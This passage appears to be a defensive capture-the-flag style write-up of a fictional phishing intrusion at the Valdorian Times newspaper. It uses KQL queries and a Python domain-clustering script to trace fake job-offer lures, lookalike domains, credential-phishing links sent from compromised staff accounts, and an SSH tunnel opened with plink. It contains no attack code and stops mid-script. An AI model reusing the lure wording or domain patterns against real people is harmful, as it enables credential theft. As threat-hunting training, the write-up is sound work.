MVBT-MACHINE 2014-09-29 01:15:42.0000 Steve Jobs Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0 10.10.0.16 steve_jobs@valdoriantimes.news valdoriantimes.news stjobs IT Specialist
FQEI-LAPTOP 2014-12-24 07:45:33.0000 Craig Zimmerman Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) 10.10.0.8 craig_zimmerman@valdoriantimes.news valdoriantimes.news crzimmerman Congressional Reporter
CORG-DESKTOP 2015-06-24 21:20:30.0000 Kathleen Hopper Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Win64; x64; Trident/4.0) 10.10.0.21 kathleen_hopper@valdoriantimes.news valdoriantimes.news kahopper Congressional Reporter
RBLC-LAPTOP 2016-04-03 15:39:01.0000 Dan Rather Mozilla/5.0 (Windows NT 6.2; rv:50.0) Gecko/20100101 Firefox/50.0 10.10.0.39 dan_rather@valdoriantimes.news valdoriantimes.news darather Director of News Operations
Q8CS-LAPTOP 2016-11-18 02:04:16.0000 Peter Parket Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.78 Safari/537.36 10.10.0.9 peter_parket@valdoriantimes.news valdoriantimes.news peparket Director of News Operations
O5HM-MACHINE 2017-08-16 21:40:56.0000 Ida Tarbell Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.101 Safari/537.36 10.10.0.82 ida_tarbell@valdoriantimes.news valdoriantimes.news idtarbell Lead Investigative Reporter
LSL7-DESKTOP 2018-03-17 04:04:03.0000 Bob Woodward Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0 10.10.0.48 bob_woodward@valdoriantimes.news valdoriantimes.news bowoodward Lead Investigative Reporter
UL0M-MACHINE 2018-11-17 11:45:25.0000 Sonia Gose Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Safari/537.36 10.10.0.3 sonia_gose@valdoriantimes.news valdoriantimes.news sogose Senior Editor
ZSD1-MACHINE 2018-12-30 09:58:33.0000 Tom Brokaw Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36 10.10.0.76 tom_brokaw@valdoriantimes.news valdoriantimes.news tobrokaw Director of News Operations
PPKQ-LAPTOP 2019-08-26 02:52:07.0000 Nene Leaks Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.3; Trident/4.0) 10.10.0.17 nene_leaks@valdoriantimes.news valdoriantimes.news neleaks Editorial Director
ER9X-DESKTOP 2021-09-27 06:55:44.0000 Carl Bernstein Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0) 10.10.0.59 carl_bernstein@valdoriantimes.news valdoriantimes.news cabernstein Lead Investigative Reporter
3FUX-MACHINE 2022-08-19 14:57:34.0000 Chad Niles Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) 10.10.0.53 chad_niles@valdoriantimes.news valdoriantimes.news chniles Congressional Reporter
8E37-LAPTOP 2022-10-16 20:34:04.0000 Linus Torvalds Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36 10.10.0.79 linus_torvalds@valdoriantimes.news valdoriantimes.news litorvalds IT Specialist
W4PH-DESKTOP 2022-12-07 16:24:56.0000 Bill Gates Mozilla/5.0 (Windows NT 5.1; rv:46.0) Gecko/20100101 Firefox/46.0 10.10.0.34 bill_gates@valdoriantimes.news valdoriantimes.news bigates IT Specialist
JJ2F-MACHINE 2023-04-09 18:43:57.0000 Tyler Byers Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko 10.10.0.52 tyler_byers@valdoriantimes.news valdoriantimes.news tybyers Congressional Reporter
WOJY-LAPTOP 2023-08-02 23:29:00.0000 Kenneth But Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.3; WOW64; Trident/6.0) 10.10.0.14 kenneth_but@valdoriantimes.news valdoriantimes.news kebut Congressional Reporter
A37A-DESKTOP 2024-01-02 08:00:00.0000 Ronnie McLovin Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36 10.10.0.19 ronnie_mclovin@valdoriantimes.news valdoriantimes.news romclovin Editorial Intern

And distributed across the following roles:

FileCreationEvents
| where filename =~ "hacktivist_manifesto.ps1"
| distinct hostname
| lookup Employees on $left.hostname == $right.hostname
| summarize count() by role
Query Results
role count_
IT Specialist 5
Congressional Reporter 5
Director of News Operations 4
Lead Investigative Reporter 4
Editorial Intern 1
Editorial Director 1
Senior Editor 1

Among the affected are Editorial Intern Ronnie McLovin and Editorial Director Nene Leaks. Since the article -- not written by Ronnie McLovin by her own account, and not reviewed and approved by Nene Leaks -- came from Ronnie's email address, it's likely that after the attackers established an SSH tunnel with plink they used Ronnie's accounts and device to plant the article.

Before going any further, I'd like to check what domains and other IP addresses the attacker might've used in their campaign against the Valdorian Times.

PassiveDns
| where ip == "136.130.190.181" //to check what domains are associated with the known IP

PassiveDns
| where ip == "136.130.190.181"
| distinct domain
| lookup PassiveDns on $left.domain == $right.domain //to check what other IPs might be used
| distinct ip

The sole domain is promotion-hire.info. The reverse search shows that the only IP address used by the attackers in this campaign is 136.130.190.181. However, Sonia Gose got an email with a link to promotionrecruit.com, and surprisingly, PassiveDns returns nothing when looking that domain up.

Before digging deeper into Ronnie McLovin's system, I wanted to check what other emails might exist associated with the campaign. I already know 21 distinct employees downloaded the malicious .docx file, but maybe others got emails and never downloaded or opened the file; maybe there are more clues to who the threat actors are.

Email
| where sender == "newspaper_jobs@gmail.com"
or reply_to == "newspaper_jobs@gmail.com"
Query Results
timestamp sender reply_to recipient subject verdict link
2024-01-05 09:42:05.0000 newspaper_jobs@gmail.com newspaper_jobs@gmail.com sonia_gose@valdoriantimes.news [EXTERNAL] FW: Invitation to Apply: Lead Political Correspondent CLEAN https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-07 09:56:06.0000 newspaper_jobs@gmail.com newspaper_jobs@gmail.com linus_torvalds@valdoriantimes.news [EXTERNAL] Your Chance to Shape the News: Current Openings in Investigative Journalism SUSPICIOUS https://promotionrecruit.com/files/public/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-08 05:16:17.0000 newspaper_jobs@gmail.com newspaper_jobs@gmail.com chad_niles@valdoriantimes.news [EXTERNAL] Seeking Talented Photojournalists for Dynamic News Coverage SUSPICIOUS http://promotion-recruit.com/files/modules/online/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-08 05:16:17.0000 newspaper_jobs@gmail.com newspaper_jobs@gmail.com tom_brokaw@valdoriantimes.news [EXTERNAL] Seeking Talented Photojournalists for Dynamic News Coverage SUSPICIOUS http://promotion-recruit.com/files/modules/online/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-09 03:58:13.0000 valdorias_best_recruiter@gmail.com newspaper_jobs@gmail.com barbara_walters@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://hire-recruit.info/images/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-09 03:58:13.0000 valdorias_best_recruiter@gmail.com newspaper_jobs@gmail.com bill_gates@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://hire-recruit.info/images/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-09 03:58:13.0000 valdorias_best_recruiter@gmail.com newspaper_jobs@gmail.com tyler_byers@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://hire-recruit.info/images/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-09 03:58:13.0000 valdorias_best_recruiter@gmail.com newspaper_jobs@gmail.com tom_brokaw@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://hire-recruit.info/images/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-13 08:38:12.0000 newspaper_jobs@gmail.com valdorias_best_recruiter@gmail.com steve_jobs@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://promotionrecruit.com/share/files/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-13 08:38:12.0000 newspaper_jobs@gmail.com valdorias_best_recruiter@gmail.com kenneth_but@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://promotionrecruit.com/share/files/Valdorian_Times_Editorial_Offer_Letter.docx

Most got flagged as suspicious, except--crucially--Sonia Gose's. There is a previously-unseen email address and domain: valdorias_best_recruiter@gmail.com and promotion-recruit.com; the IP address used with plink was previously confirmed to resolve to promotion-hire.info, and promotionrecruit.com is the domain from which Sonia Gose downloaded the malicious file. To check if there are any other IPs and/or domains, I run:

Email
| where sender == "newspaper_jobs@gmail.com"
or reply_to == "newspaper_jobs@gmail.com"
| extend domain = tostring(parse_url(link).Host)
| distinct domain
| lookup PassiveDns on $left.domain == $right.domain
| distinct ip

...which returns nothing, to my surprise. The only IP address in PassiveDns is the one used with plink.
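
With PassiveDns offering no pivot beyond the one IP, what still ties the lure domains together is their spelling: promotionrecruit.com, promotion-recruit.com, promotion-hire.info, hire-recruit.info and hirerecruit.org are hyphen and TLD variations on the same three words. The Python below is an added example, not part of the KC7 case or this writeup: it extracts hosts from the link column the way parse_url(link).Host does, learns the word vocabulary from the hyphenated labels, segments the unhyphenated ones, and groups every host that shares a word with the PassiveDns-known seed. The link list is constructed from the results above (plus the internal SharePoint link as a control); the registrable-label logic assumes single-label public suffixes.

```python
from collections import defaultdict
from urllib.parse import urlparse

# Link column of the Email results above (fictional domains from the case), plus one
# internal SharePoint link that must not be pulled into the cluster.
SAMPLE_LINKS = [
    "https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx",
    "https://promotionrecruit.com/files/public/Valdorian_Times_Editorial_Offer_Letter.docx",
    "http://promotion-recruit.com/files/modules/online/Valdorian_Times_Editorial_Offer_Letter.docx",
    "http://hire-recruit.info/images/online/published/Stop_Being_So_Broke_Get_Money_Now.docx",
    "http://promotionrecruit.com/share/files/Valdorian_Times_Editorial_Offer_Letter.docx",
    "http://hirerecruit.org/search/online/published/Stop_Being_So_Broke_Get_Money_Now.docx",
    "https://sharepoint.valdoriantimes.news/files/rmclovin/2024/OpEdFinal_to_print.docx",
]
SEED_DOMAIN = "promotion-hire.info"   # the one domain PassiveDns tied to 136.130.190.181


def link_hosts(links):
    """Python counterpart of `extend domain = tostring(parse_url(link).Host) | distinct domain`."""
    hosts = []
    for link in links:
        host = urlparse(link).hostname
        if host and host not in hosts:
            hosts.append(host)
    return hosts


def registrable_label(host):
    """Second-to-last label (promotion-recruit.com -> promotion-recruit).
    Assumes single-label public suffixes; a real tool would consult the Public Suffix List."""
    parts = host.split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def core(host):
    """Registrable label with separators stripped, so hyphen variants collapse together."""
    return "".join(ch for ch in registrable_label(host) if ch.isalnum())


def learn_vocab(hosts):
    """Hyphenated labels reveal word boundaries: promotion-recruit -> {promotion, recruit}."""
    vocab = set()
    for h in hosts:
        label = registrable_label(h)
        if "-" in label:
            vocab.update(p for p in label.split("-") if p)
    return vocab


def tokens(host, vocab):
    """Greedy longest-match segmentation of the core into vocabulary words;
    anything unsegmentable stays as one opaque token."""
    text, out = core(host), set()
    words = sorted(vocab, key=len, reverse=True)
    while text:
        for w in words:
            if text.startswith(w):
                out.add(w)
                text = text[len(w):]
                break
        else:
            out.add(text)
            text = ""
    return out


def related_domains(hosts, seed, vocab):
    """Hosts sharing at least one vocabulary word with the seed, grouped by core
    so that promotionrecruit.com and promotion-recruit.com land in one bucket."""
    seed_tokens = tokens(seed, vocab)
    groups = defaultdict(set)
    for h in hosts:
        if tokens(h, vocab) & seed_tokens:
            groups[core(h)].add(h)
    return dict(groups)


if __name__ == "__main__":
    hosts = link_hosts(SAMPLE_LINKS)
    vocab = learn_vocab(hosts + [SEED_DOMAIN])
    for key, members in related_domains(hosts, SEED_DOMAIN, vocab).items():
        print(key, sorted(members))
```

The vocabulary is learned from the data rather than hard-coded, so a new variant such as recruit-promotion.org would join the cluster without changing the code; the internal SharePoint host shares no word with the seed and stays out.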

To check what other emails could've been sent from the discovered address:

Email
| where sender == "valdorias_best_recruiter@gmail.com"
or reply_to == "valdorias_best_recruiter@gmail.com"
Query Results
timestamp sender reply_to recipient subject verdict link
2024-01-03 06:39:22.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com ida_tarbell@valdoriantimes.news [EXTERNAL] Exciting Career Opportunity: Senior Editor Position at Valdorian Leader SUSPICIOUS http://hirerecruit.org/search/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-03 06:39:22.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com peter_parket@valdoriantimes.news [EXTERNAL] Exciting Career Opportunity: Senior Editor Position at Valdorian Leader SUSPICIOUS http://hirerecruit.org/search/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-03 06:39:22.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com kathleen_hopper@valdoriantimes.news [EXTERNAL] Exciting Career Opportunity: Senior Editor Position at Valdorian Leader SUSPICIOUS http://hirerecruit.org/search/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-03 06:39:22.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com nene_leaks@valdoriantimes.news [EXTERNAL] Exciting Career Opportunity: Senior Editor Position at Valdorian Leader SUSPICIOUS http://hirerecruit.org/search/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-03 06:39:22.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com mark_zuckerberg@valdoriantimes.news [EXTERNAL] Exciting Career Opportunity: Senior Editor Position at Valdorian Leader SUSPICIOUS http://hirerecruit.org/search/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-03 06:39:22.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com larry_page@valdoriantimes.news [EXTERNAL] Exciting Career Opportunity: Senior Editor Position at Valdorian Leader SUSPICIOUS http://hirerecruit.org/search/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-05 09:42:05.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com dan_rather@valdoriantimes.news [EXTERNAL] Breaking News: We're Hiring! Apply Now for Reporter Roles CLEAN https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-05 09:42:05.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com carl_bernstein@valdoriantimes.news [EXTERNAL] Breaking News: We're Hiring! Apply Now for Reporter Roles CLEAN https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-05 09:42:05.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com barbara_walters@valdoriantimes.news [EXTERNAL] Breaking News: We're Hiring! Apply Now for Reporter Roles CLEAN https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-05 09:42:05.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com bob_woodward@valdoriantimes.news [EXTERNAL] Breaking News: We're Hiring! Apply Now for Reporter Roles CLEAN https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-09 03:58:13.0000 valdorias_best_recruiter@gmail.com newspaper_jobs@gmail.com barbara_walters@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://hire-recruit.info/images/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-09 03:58:13.0000 valdorias_best_recruiter@gmail.com newspaper_jobs@gmail.com bill_gates@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://hire-recruit.info/images/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-09 03:58:13.0000 valdorias_best_recruiter@gmail.com newspaper_jobs@gmail.com tyler_byers@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://hire-recruit.info/images/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-09 03:58:13.0000 valdorias_best_recruiter@gmail.com newspaper_jobs@gmail.com tom_brokaw@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://hire-recruit.info/images/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-10 08:48:16.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com seymour_hersh@valdoriantimes.news [EXTERNAL] Breaking News: We're Hiring! Apply Now for Reporter Roles CLEAN https://promotionrecruit.org/share/Editorial_J0b_Openings_2024.docx
2024-01-10 08:48:16.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com ronnie_mclovin@valdoriantimes.news [EXTERNAL] Breaking News: We're Hiring! Apply Now for Reporter Roles CLEAN https://promotionrecruit.org/share/Editorial_J0b_Openings_2024.docx
2024-01-10 08:48:16.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com seymour_hersh@valdoriantimes.news [EXTERNAL] Breaking News: We're Hiring! Apply Now for Reporter Roles CLEAN https://promotionrecruit.org/share/Editorial_J0b_Openings_2024.docx
2024-01-12 10:57:26.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com craig_zimmerman@valdoriantimes.news [EXTERNAL] Join Our Team: Valdy Post Seeking Experienced Journalists CLEAN https://promotion-job.org/share/Editorial_J0b_Openings_2024.docx
2024-01-13 08:38:12.0000 newspaper_jobs@gmail.com valdorias_best_recruiter@gmail.com steve_jobs@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://promotionrecruit.com/share/files/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-13 08:38:12.0000 newspaper_jobs@gmail.com valdorias_best_recruiter@gmail.com kenneth_but@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://promotionrecruit.com/share/files/Valdorian_Times_Editorial_Offer_Letter.docx

These emails cover more of the Valdorian Times staff who were infected with the PowerShell script (see [10]), but not all of them. Note that Ronnie McLovin was contacted by the threat actors with a false job offer on 2024-01-10 at 08:48:16 in the morning. Her malicious attachment is Editorial_J0b_Openings_2024.docx.

let bad_domains =
Email
| where sender == "newspaper_jobs@gmail.com"
or reply_to == "newspaper_jobs@gmail.com"
| extend domain = tostring(parse_url(link).Host)
| distinct domain;
Email
| where tostring(parse_url(link).Host) in (bad_domains)
Query Results
timestamp sender reply_to recipient subject verdict link
2024-01-04 05:16:25.0000 ida_tarbell@valdoriantimes.news ida_tarbell@valdoriantimes.news jim_mckay@valdoriantimes.news Urgent Legal Notice: Lawsuit Filed Against Valorian CLEAN https://promotionrecruit.com/modules/public/published/share/signin
2024-01-04 05:16:25.0000 ida_tarbell@valdoriantimes.news ida_tarbell@valdoriantimes.news jim_mckay@valdoriantimes.news Urgent Legal Notice: Lawsuit Filed Against Valorian CLEAN https://promotionrecruit.com/modules/public/published/share/signin
2024-01-04 05:16:25.0000 ida_tarbell@valdoriantimes.news ida_tarbell@valdoriantimes.news jim_mckay@valdoriantimes.news Urgent Legal Notice: Lawsuit Filed Against Valorian CLEAN https://promotionrecruit.com/modules/public/published/share/signin
2024-01-05 09:42:05.0000 newspaper_jobs@gmail.com newspaper_jobs@gmail.com sonia_gose@valdoriantimes.news [EXTERNAL] FW: Invitation to Apply: Lead Political Correspondent CLEAN https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-05 09:42:05.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com dan_rather@valdoriantimes.news [EXTERNAL] Breaking News: We're Hiring! Apply Now for Reporter Roles CLEAN https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-05 09:42:05.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com carl_bernstein@valdoriantimes.news [EXTERNAL] Breaking News: We're Hiring! Apply Now for Reporter Roles CLEAN https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-05 09:42:05.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com barbara_walters@valdoriantimes.news [EXTERNAL] Breaking News: We're Hiring! Apply Now for Reporter Roles CLEAN https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-05 09:42:05.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com bob_woodward@valdoriantimes.news [EXTERNAL] Breaking News: We're Hiring! Apply Now for Reporter Roles CLEAN https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-06 03:42:39.0000 dan_rather@valdoriantimes.news dan_rather@valdoriantimes.news carl_bernstein@valdoriantimes.news Fact Check Required: Discrepancies in Recent Report. CLEAN http://promotionrecruit.com/share/public/published/auth
2024-01-06 03:42:39.0000 dan_rather@valdoriantimes.news dan_rather@valdoriantimes.news bob_woodward@valdoriantimes.news Fact Check Required: Discrepancies in Recent Report. CLEAN http://promotionrecruit.com/share/public/published/auth
2024-01-06 03:42:39.0000 dan_rather@valdoriantimes.news dan_rather@valdoriantimes.news bob_woodward@valdoriantimes.news Fact Check Required: Discrepancies in Recent Report. CLEAN http://promotionrecruit.com/share/public/published/auth
2024-01-07 09:56:06.0000 newspaper_jobs@gmail.com newspaper_jobs@gmail.com linus_torvalds@valdoriantimes.news [EXTERNAL] Your Chance to Shape the News: Current Openings in Investigative Journalism SUSPICIOUS https://promotionrecruit.com/files/public/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-08 05:16:17.0000 newspaper_jobs@gmail.com newspaper_jobs@gmail.com chad_niles@valdoriantimes.news [EXTERNAL] Seeking Talented Photojournalists for Dynamic News Coverage SUSPICIOUS http://promotion-recruit.com/files/modules/online/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-08 05:16:17.0000 newspaper_jobs@gmail.com newspaper_jobs@gmail.com tom_brokaw@valdoriantimes.news [EXTERNAL] Seeking Talented Photojournalists for Dynamic News Coverage SUSPICIOUS http://promotion-recruit.com/files/modules/online/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-09 03:58:13.0000 valdorias_best_recruiter@gmail.com newspaper_jobs@gmail.com barbara_walters@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://hire-recruit.info/images/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-09 03:58:13.0000 valdorias_best_recruiter@gmail.com newspaper_jobs@gmail.com bill_gates@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://hire-recruit.info/images/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-09 03:58:13.0000 valdorias_best_recruiter@gmail.com newspaper_jobs@gmail.com tyler_byers@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://hire-recruit.info/images/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-09 03:58:13.0000 valdorias_best_recruiter@gmail.com newspaper_jobs@gmail.com tom_brokaw@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://hire-recruit.info/images/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-09 10:44:35.0000 bill_gates@valdoriantimes.news bill_gates@valdoriantimes.news bob_costas@valdoriantimes.news Urgent Legal Notice: Lawsuit Filed Against Valorian CLEAN https://promotionrecruit.com/modules/login
2024-01-09 10:44:35.0000 bill_gates@valdoriantimes.news bill_gates@valdoriantimes.news howard_cosell@valdoriantimes.news Urgent Legal Notice: Lawsuit Filed Against Valorian CLEAN https://promotionrecruit.com/modules/login
2024-01-09 10:44:35.0000 bill_gates@valdoriantimes.news bill_gates@valdoriantimes.news bob_costas@valdoriantimes.news Urgent Legal Notice: Lawsuit Filed Against Valorian CLEAN https://promotionrecruit.com/modules/login
2024-01-10 07:02:06.0000 tyler_byers@valdoriantimes.news tyler_byers@valdoriantimes.news seymour_hersh@valdoriantimes.news Fact Check Required: Discrepancies in Recent Report. CLEAN https://hire-recruit.info/published/images/login
2024-01-10 07:02:06.0000 tyler_byers@valdoriantimes.news tyler_byers@valdoriantimes.news seymour_hersh@valdoriantimes.news Fact Check Required: Discrepancies in Recent Report. CLEAN https://hire-recruit.info/published/images/login
2024-01-10 07:02:06.0000 tyler_byers@valdoriantimes.news tyler_byers@valdoriantimes.news seymour_hersh@valdoriantimes.news Fact Check Required: Discrepancies in Recent Report. CLEAN https://hire-recruit.info/published/images/login
2024-01-11 07:58:31.0000 seymour_hersh@valdoriantimes.news seymour_hersh@valdoriantimes.news howard_cosell@valdoriantimes.news Urgent Legal Notice: Lawsuit Filed Against Valorian CLEAN https://hire-recruit.info/share/modules/public/login?language=en
2024-01-11 07:58:31.0000 seymour_hersh@valdoriantimes.news seymour_hersh@valdoriantimes.news ernie_johnson@valdoriantimes.news Urgent Legal Notice: Lawsuit Filed Against Valorian CLEAN https://hire-recruit.info/share/modules/public/login?language=en
2024-01-11 07:58:31.0000 seymour_hersh@valdoriantimes.news seymour_hersh@valdoriantimes.news howard_cosell@valdoriantimes.news Urgent Legal Notice: Lawsuit Filed Against Valorian CLEAN https://hire-recruit.info/share/modules/public/login?language=en
2024-01-13 08:38:12.0000 newspaper_jobs@gmail.com valdorias_best_recruiter@gmail.com steve_jobs@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://promotionrecruit.com/share/files/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-13 08:38:12.0000 newspaper_jobs@gmail.com valdorias_best_recruiter@gmail.com kenneth_but@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://promotionrecruit.com/share/files/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-13 09:55:23.0000 steve_jobs@valdoriantimes.news steve_jobs@valdoriantimes.news howard_cosell@valdoriantimes.news Urgent Legal Notice: Lawsuit Filed Against Valorian CLEAN https://hire-recruit.info/share/online/public/files/login?language=en
2024-01-13 09:55:23.0000 steve_jobs@valdoriantimes.news steve_jobs@valdoriantimes.news bob_costas@valdoriantimes.news Urgent Legal Notice: Lawsuit Filed Against Valorian CLEAN https://hire-recruit.info/share/online/public/files/login?language=en
2024-01-13 09:55:23.0000 steve_jobs@valdoriantimes.news steve_jobs@valdoriantimes.news bob_costas@valdoriantimes.news Urgent Legal Notice: Lawsuit Filed Against Valorian CLEAN https://hire-recruit.info/share/online/public/files/login?language=en

Evidently, the threat actor(s) losing interest in Sonia Gose was more of a fluke than anything. They also took over various employee email accounts and used them to send links to phishing pages to other Valdorian Times employees:

  • Lead Investigative Reporter Ida Tarbell (ida_tarbell@valdoriantimes.news) sends an email to Sports Reporter Jim McKay (jim_mckay@valdoriantimes.news) with the subject Urgent Legal Notice: Lawsuit Filed Against Valorian, with a link to a phishing page
  • Director of News Operations Dan Rather (dan_rather@valdoriantimes.news) sends an email to Lead Investigative Reporter Carl Bernstein (carl_bernstein@valdoriantimes.news) and Lead Investigative Reporter Bob Woodward (bob_woodward@valdoriantimes.news) with the subject Fact Check Required: Discrepancies in Recent Report, with a link to a phishing page
  • IT Specialist Bill Gates (bill_gates@valdoriantimes.news) sends an email to Sports Reporter Bob Costas (bob_costas@valdoriantimes.news) and Sports Reporter Howard Cosell (howard_cosell@valdoriantimes.news) with the subject line Urgent Legal Notice: Lawsuit Filed Against Valorian, with a link to a phishing page
  • Congressional Reporter Tyler Byers (tyler_byers@valdoriantimes.news) sends an email to Lead Investigative Reporter Seymour Hersh (seymour_hersh@valdoriantimes.news) with the subject Fact Check Required: Discrepancies in Recent Report. and a link to a phishing page
  • Lead Investigative Reporter Seymour Hersh (seymour_hersh@valdoriantimes.news) sends an email to Sports Reporter Howard Cosell (howard_cosell@valdoriantimes.news) and Sports Reporter Ernie Johnson (ernie_johnson@valdoriantimes.news) with the subject Urgent Legal Notice: Lawsuit Filed Against Valorian
  • IT Specialist Steve Jobs (steve_jobs@valdoriantimes.news) sends an email to Sports Reporter Howard Cosell (howard_cosell@valdoriantimes.news) and Sports Reporter Bob Costas (bob_costas@valdoriantimes.news) with the subject Urgent Legal Notice: Lawsuit Filed Against Valorian and a link to a phishing page

There is also a previously-unseen malicious attachment: Stop_Being_So_Broke_Get_Money_Now.docx. Both this and the "Valdorian Times Offer Letter" document exist across 18 distinct computers.
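The two queries above do the domain pivot in two manual steps: addresses known to be bad give link domains, and those domains give further emails. The following is an added example (Python rather than KQL, and not the case's own data or code) that runs the same pivot to a fixed point over constructed Email rows adapted from the output above: every external address that links to a bad domain is folded back into the seed set, while internal senders are reported separately as likely compromised accounts rather than treated as attacker addresses. The benign intranet row is a constructed control that must not be flagged.

```python
"""Pivot from one known-bad mail address through link domains to further
phishing mail and to internal accounts that sent links to those domains.
Added example in Python, not the write-up's KQL; rows are constructed,
adapted from the Email query output in the write-up."""
from urllib.parse import urlparse

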